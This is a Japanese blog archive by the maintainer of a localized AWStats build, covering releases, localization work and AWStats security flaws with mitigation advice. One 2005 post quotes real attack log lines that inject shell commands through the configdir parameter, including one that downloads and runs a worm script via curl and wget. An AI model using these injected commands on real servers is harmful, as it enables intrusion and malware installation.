サイト内検索

ADS by Google


カテゴリー
AWStats [22]
Google [10]
Windows Vista [6]
YouTube [3]
コンピュータ関連 [24]
セキュリティ [53]
一般 [14]
副業 [14]
本業 [8]
[28]
趣味 [3]

最近のエントリー

Syndicate this site (XML)
HOME >>AWStats

2007年02月18日

AWStats Ver.6.6完全日本語版公開開始

ちょっと遅れましたが、公開を開始しました。

機能としては、完全にVer.6.5と同一です。
Refererの解析で、VodafoneがなくなったのでSoftbankに変えたこと位でしょうか。
あとは、私がやったわけではありませんが、utf8_decode.plが改良されています。
#hobbit氏は、今回もuft8_decode.plの同梱を快く許可してくださいました。
#この場を借りて御礼を申し上げます

ドキュメントについては、とりあえず英語版をそのまま掲載しています。
Ver.6.x台はドキュメントの日本語訳がおざなりになっていたので、今回は真面目にやりたいなぁと思っていますが....でも、アクセス解析を見ると参照されている方が結構いらっしゃるようなので、気長に頑張りたいと思います。
#本家の方の動きがピタリと止まっていて、次期バージョンがすぐに出るようなことはなさそうなので。

なにはともあれ、今後も完全日本語版のAWStatsをよろしくお願いいたします。

2007 02 18 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2007年01月09日

AWStats Ver.6.6完全日本語版作成中 (1)

週末に少々時間が取れたので、作業してみました。

Ver.6.5相当の日本語化は完了しています。
本体にはほとんど手が入っていないので、思ったよりも簡単に終わってしまいました。
一応こちらで閲覧できますが、見た目ではVer.6.5と区別がつきませんね...

管理人はプログラミングははっきり言ってヘタレなので、これ以上の改良を施せるかどうか
はわかりませんが、ブラウザやロボットの検知をもう少し頑張ってみたいなぁと思っています。

2007 01 09 | この記事へのリンク | この記事へのコメント (0) | トラックバック (1)


2007年01月03日

AWStats Ver.6.6が公開されているみたいです(^^;

管理人もしばらく気が付かなかったのですが、2006年12月23日付でAWStats Ver.6.6の正式版
が公式サイトにて公開が開始されていた模様です。

公式ページの左上にリリース速報が掲載されているのですが、こちらは

awstats66.png

現時点でもこのように表示されるので、管理人もここだけチェックしていて油断していました。
しかし、下の方にスクロールしてみてみると....

awstats66info.png

しっかり更新されていました....orz
#冷静に考えてみると、以前もこんなことがあったような記憶が...

changelogを見る限りではそれほど重要な更新はなさそうですが、粛々と日本語化を進めたい
と思っています。

2007 01 03 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2006年05月05日

[続報] AWStats Ver.6.5にXSSの脆弱性

AWStatsの公式サイトのセキュリティアナウンスに情報が登録されました。それによると、

---------------------------------------------------------------------------------
When AWStats version is 6.4 or 6.5 is used as a CGI:
If the update of the stats via web front-end is allowed, a remote attacker can
execute arbitrary code on the server using a specially crafted request involving
the migrate parameter.
Input starting with a pipe character ("|") leads to an insecure call to Perl's open
function and the rest of the input being executed in a shell. The code is run in
the context of the process running the AWStats CGI.

When AWStats version is 6.5 or lower and is used to build static pages:
If you use AWStats to build static pages, you are completely safe, whatever is
the version of AWStats you use.
---------------------------------------------------------------------------------
AWStats Ver.6.4もしくは6.5をCGIとして利用している場合:
Webからの更新処理が許可されている場合、マイグレーション用のパラメータに関連する特別に
作りこまれたリクエストを悪用することにより、リモートの攻撃者が不正なコードをサーバ上で実行
することができます。
パイプキャラクタ("|")を含む入力文字列がPerlのopen関数を安全ではない方法で呼び出し、結果
として残りの入力文字列がシェルで実行されます。コードはAWStatsのCGIを実行しているプロセス
のコンテクストで実行されます。

AWStatsのバージョンが6.5以下、もしくは静的にページを構築している場合:
AWStatsを利用して静的にページを構築している場合、AWStatsのバージョンを問わず、全く安全
です。
---------------------------------------------------------------------------------

ということですので、一般的な利用方法である限りにおいては(少なくとも当サイトで公開している
やり方を採用する限りにおいては)、問題がないということのようです。

いくつかの情報が飛び交っていますが、とりあえず現時点で公式サイトで公開されているVer.6.5
に関係するセキュリティ情報は以上です。追加があったらまた書きます。

2006 05 05 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2006年05月02日

AWStats Ver.6.5にXSSの脆弱性

実は数日前に情報は頂いていたのですが、各所で目に付くようになったので一応コメント。

AWStats Cross-Site Scripting and Full Path Disclosure (Secunia)
AWStats 6.5.x multiple vuln. (UNSECURED SYSTEMS)

上記ページに書かれている状態から変化はなく、AWStats本家では今のところ動きがありません。
Workaroundも紹介されていないため、何かの情報が出たら対応しようと考えております。

"Less Critical (Secunia)"ということで、過去に出たものほど致命的というわけではないので、念のため。

2006 05 02 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2006年04月10日

AWStats Ver.6.6開発再開?

しばらく開発が停止していたように見えたAWStatsですが、Ver.6.6の開発が始まっているようです。

Changelogを見ても、現時点では大きな機能追加はないようですが、とりあえず定期的にサイトを
確認する必要はあるようです。

2006 04 10 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2006年04月02日

AWStats Ver.6.5完全日本語版配布開始!

かなり時間がたってしまいましたが、AWStats Ver.6.5の完全日本語版の公開を開始しました。

詳細についてはこちらを参照していただきたいのですが、個人的にはLunascapeとSleipnirの
検出機能が追加されたのがお勧めです。

ちょっと前にセキュリティホールが次々と露見して大変だったAWStatsですが、Ver.6.5では現時点で
セキュリティホールは見つかっていないので、過去のバージョンをご利用の方も移行を検討して頂ければ
幸いです。

もしこのページを見てダウンロードする方がいらっしゃったらコメントを、blogで採り上げられるのでしたら
トラックバックをいただけるとうれしいです。

2006 04 02 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2006年03月26日

AWStats Ver.6.5完全日本語版鋭意作成中!

原稿や引越しが一段落したので、今更ながらやっています。
一部以前の再掲になりますが、主な改造ポイントは以下の通りです。

 ・表示されるレポートの”自然な”日本語化(Tooltip Helpも含む)
 ・日本ローカルな検索エンジン(goo, Biglobe, Niftyなど)の検知
 ・文字化けしてしまう検索エンジンで利用された日本語の検索語のデコード
 ・GoogleおよびYahooのキャッシュからのアクセスの検知
 ・レポートで表示される国名の日本語化
 ・awstats.model.conf(設定サンプルファイル)の完全日本語化
 ・以下のブラウザが検出されるように修正。同時にアイコンも追加
  ●Sleipnir
  ●Lunascape
  ●iモード端末
  ●au端末
  ●Vodafone端末
 ・以下のロボットが検出されるように修正
  ●はてなアンテナ
  ●Naver(つぶれたらしいから、もういらないかも)
  ●Bookmark Renewal Agent
  ●LivedoorCheckers
  ●gooラボのロボット(Referer名 : ichiro)
  ●goo RSS Reader

こんな感じです。
Ver.6.5で追加した機能の目玉は、SleipnirやLunascapeの検知でしょうか。

検索語のデコード(utf8_decode.pl)については、Hobbit氏が修正されたものを利用させていただく予定です。

Hobbit氏のサイトでも、Hobbit氏が日本語化を行ったバージョンを配布されています。
Hobbit氏バージョンは、管理人バージョンとは少々目指す方向が異なっているので、比較検討の上好きな方を利用するといいと思います。

2006 03 26 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2006年01月04日

AWStats Ver.6.5リリース!!!!...? (続報2)

トップページの左肩にあるNewsは更新されていませんが、ダウンロードのところを見ると完全に
Ver.6.5が最新という扱いになりました。

ニュースメールはまだきていませんが、本当にリリースされたと見て間違いないでしょう。
修正も12/25以降は入っていないようですし....

2006 01 04 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2005年12月26日

AWStats Ver.6.5リリース!!!!...? (続報)

こちらの"Last commit logs"を見ると、リリースされたこと自体は間違いないようです。

でも、土壇場で色々修正を入れているようです。
#昨日の夜見た時点では、12/24でリリースになっていたのに....

やはり、とりあえず様子見でしょうか。

2005 12 26 | この記事へのリンク | この記事へのコメント (2) | トラックバック (0)


2005年12月25日

AWStats Ver.6.5リリース!!!!...?

長らくβ版の状態が続いていたAWStats Ver.6.5が正式にリリースされた模様です。

といっても、ページ自体にはスクリプトのエラーが出ているようなので、100%確かではありません。
が、Ver.6.4が旧版の一覧に入っていたり、ダウンロード時に出る警告がなくなっていること
などから、正式なリリースがあったことは間違いがないと思われます。
#Changelogが12/4で止まっているのが少々気になりますが....

とりあえず注意して眺めるようにしなきゃなぁ。
これで年末年始にVer.6.5の日本語化ができる...かな?
#原稿でそれどころじゃない可能性もありますが(笑

2005 12 25 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2005年12月03日

Perman Surfer

というRobotが登録されているんですが、これって実はB.U.Gの波乗野郎のことだったんですね...
ということで、検証中のAWStats 6.5でそう表示できるように修正しました。

2005 12 03 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2005年11月27日

AWStats Ver.6.5 Bata2公開

ひっそりと...ですが、AWStats Ver.6.5がとうとうBeta2になりました。

それに併せて、こちらのサイトで公開しているサンプルもBeta2ベースのものにしました。
"Added safari versions mapping"とあるので、Safariのバージョン統計が取れると
思っていたのですが、どうやら今のところ取れないようです。
また、OS検知がより詳細になったのはいいのですが、BSDのアイコンがうまくリンクできて
いないようです。

本格リリースはまだまだ先なのかなぁ(哀

2005 11 27 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2005年10月30日

AWStats 6.5の日本語化進捗状況

久しぶりにいじりました。

一向に正式版が公開される気配がないのはあいかわらずですが、とりあえず今までに行った作業
をまとめておきます。

 ・browsers.pmをいじって、以下のブラウザが検出されるように修正。同時にアイコンも追加。
  ●Sleipnir
  ●Lunascape
  ●iモード端末
  ●au端末
  ●Vodafone端末
  ●goo RSS Reader(これはどちらかといえばロボットかもしれない)
 ・Robots.pmをいじって、以下のロボットが検出されるように修正。
  ●はてなアンテナ
  ●Naver(つぶれたらしいから、もういらないかも)
  ●Bookmark Renewal Agent
  ●LivedoorCheckers
  ●gooラボのロボット(Referer名 : ichiro)

あと、正式版が公開されたら、awstas.plの表記の修正と、ドキュメントの日本語化を行うと思います。
とりあえず目玉は携帯系の端末をちゃんと検出できるようにしたことでしょうか。
SleipnirやLunascapeも意外とアクセスがるので、検出する価値はあると思っています。

今回から、browsers_phone.pmという、携帯電話の機種まで検出できるようなブラウザリストが
本体に同梱されています。でも、検出可能な機種は当然英語圏のもので、日本で利用されている
端末が一切入っていないため、これに対応したいとも思っていますが、要望しだいでしょうか....

2005 10 30 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2005年09月22日

AWStats 6.5の評価を開始しました

なかなか正式版が公開されないVer.6.5ですが、とりあえず評価を開始しました。
日本語は以前よりもかなりましになっているので、UI周りはいじるところはあまり
なさそうな雰囲気です。

といっても、それでは何もやることがなくなってしまうので、完全日本語版Ver.5.0
の時点で実現している機能を含めて、
 ・Yahoo Cacheの検出と検知
 ・Google Cache経由のアクセスの検索語の検知
 ・ドキュメントの日本語化
 ・日本ローカルな検索エンジンへの対応
 ・日本ローカルなブラウザ(LunascapeやSlapnir)への対応
 ・携帯電話からのアクセスの検出
 ・UIのより完璧な日本語化
あたりを目標に作業しようと思っています。

とりあえずRefererの検出から作業を進めているところです。
この部分については現在公開しているサンプルでも確認できますので、
興味がある方は見てみてください。

2005 09 22 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2005年05月17日

Referer Spam

久しぶりにAWStatsのサンプル統計ページを見て驚きました。
リンク元のところがReferer Spamでえらいことになっている....

今までも何回かRefer Spamが襲来したことはありましたが、今回のは
ちょっと規模がとんでもないです。まともなリンク元を見つけるのが困難
なまでにやられています。

何か根本的な対策はないのでしょうか.....

2005 05 17 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2005年03月06日

突いてくる人たち

AWStatsの脆弱性はかなりその手の人々の興味を引いたようで、今でも
色々な形でちょっかいを出してくる人が後を絶ちません。

140.247.xxx.xxx - - [25/Feb/2005:05:17:14 +0900] "GET
/cgi-bin/AWStats5_Stable/awstats.pl?configdir=| echo;
echo; perl -e \"print q(jSVowMsd)\"; echo; echo; |
HTTP/1.0" 500 634 "-" "Mozilla/4.0"

一時期大量に押し寄せました。
jSVowMsdとやらを調べても良くわからず、意味不明。

84.222.xxx.xxx - - [06/Mar/2005:05:43:16 +0900] "GET
//cgi-bin/awstats.pl?configdir=|echo ;echo ;id;echo ;echo|
HTTP/1.1" 404 304 "-" "-"

意味もなく何かを表示する。ほとんどがこれです。
ツールでも出ているのか、いろんなところから来ます。
きっとこれが成功したら、更に何かが来るんでしょう。

213.114.xxx.xxx - - [06/Mar/2005:22:50:34 +0900] "GET
/cgi-bin/test/awstats.pl?configdir=|echo ;cd /tmp;curl -O
www.xxxxxx.co.uk/spykids.txt ;perl spykids.txt ;rm -rf
spykids.txt; wget www.xxxxxx.co.uk/spykids.txt; perl
spykids.txt; rm -rf spykids.txt;echo ;echo| HTTP/1.1"
404 308 "-" "LWP::Simple/5.79"

URLは一部伏せてあります。間違って実行しちゃいましたが、PHPBBの
脆弱性を突くPerl.Santy.Cというワームで、管理人の環境では無害でした。
URLを見る限りでは、検索エンジンに残っている昔利用していたパスを利用
しているみたいです。

なんかまた面白そうなのが引っかかったら書きます。

2005 03 06 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2005年03月05日

Hobbit氏に感謝!

GuestbookにAWStatsの改良版作成のご報告を頂いていたので、
投稿主のHobbit氏のWebサイトを訪問してみました。
一言で言えば、”すばらしい....”でした。

どうも管理人はやる気にムラがあるので、なかなか一度何らかの形で完成
してしまったものを再度改良するという気がなかなか起きません。
AWStatsについても気になる点は何点もあるのですが、上記のやる気+
技術力の関係で、なかなか実行に移すことができずにいました。

Hobbit氏が今回行った検索エンジンのデコード部分の改良もその一つで、
検索エンジン別にデコードロジックをちゃんと組んでいるところや、
search_engines.pmの改良など、管理人が手をつけずにいた部分を
見事に改良してくれています。

AWStatsをご利用の方は、是非Hobbit氏のサイトを訪問してみて下さい。

2005 03 05 | この記事へのリンク | この記事へのコメント (0) | トラックバック (1)


2005年02月28日

3つの脆弱性の問題を修正したバージョンを公開

ということで、pluginmode/loadplugin/noloadpluginにある脆弱性を
修正したバージョンを公開しました。

pluginmodeの脆弱性については、自分のサイトで本当にブラウザ経由で
コマンドが実行できてしまってびっくりしましたが、修正後のバージョンは大丈夫
なのも確認してあります。

loadplugin/noloadpluginについては管理人の技量不足もあって脆弱性
自体を確認することはできませんでしたが、pluginmodeと同様の修正
(Sanitizeをより厳密に行う)をしましたので、多分大丈夫だと思います。

でも、AWStatsの脆弱性がこれほどまでに騒がれるとは、AWStatsも
かなり市民権を得てきたと思っていいんですかねぇ....

2005 02 28 | この記事へのリンク | この記事へのコメント (1) | トラックバック (1)


2005年02月27日

AWStatsのloadplugin/noloadpluginの脆弱性

現在鋭意修正中...なんですが、よくわからない(哀

脆弱性を指摘したドキュメントに書かれている方法でAWStatsにアクセスしてみても、
何事もなく統計画面が出てくるし。

ひょっとしたらVer.6.0には脆弱性がないんじゃないかと思うほどなんですが、文書を
見る限りでは引数のSanitizeに問題があるようなので、configdirと同様のSanitizeを
すればいいのかな?
#修正方法はそのようにかかれていますし。

再現は確認できませんが、その方向で修正するか....

2005 02 27 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2005年02月25日

AWStatsに別の脆弱性が発見されたようです

掲示板にSASAKI Katuhiroが書き込んでくださった情報によると、AWStatsに先に問題になった
configdir以外の脆弱性が発見されたようです。

詳細はこちらに出ていますが、結構やばそうな内容です。
修正方法もかかれているので、できれば今週末には対応したいと思っています。

2005 02 25 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)


2005年02月21日

AWStatsの脆弱性について

AWStats Ver.5.0~Ver.6.2に重大な脆弱性が発見されています。
詳細はこちらを参照してください。

以前はAllowUpdateFromBrowserが1(許可)になっていなければ問題はない、との
コメントがAWStats Projectから出ていましたが、現在はCGIとしての実行を止め
ないと安全ではないとのコメントに変わっています。

当サイトで公開しているAWStats完全日本語版Ver.5.0/6.0をご利用の方は、

 ・awstats.plをCGIとして実行できないようにする
  (HTTPDユーザの実行権限を無効にする)
 ・.htaccessを利用した認証を付加するなどして、統計ページが第三者から自由に
  アクセスできないようにする。
 ・当サイトで公開中の、iDefence推奨の対策を施したバージョンに入れ替える。
 ・統計ページの公開自体を取りやめる。

のいずれかの対処を緊急に取るようにしてください!

2005 02 21 | この記事へのリンク | この記事へのコメント (0) | トラックバック (0)



Copyright (C) 2005 ec-blog.com. All Rights Reserved.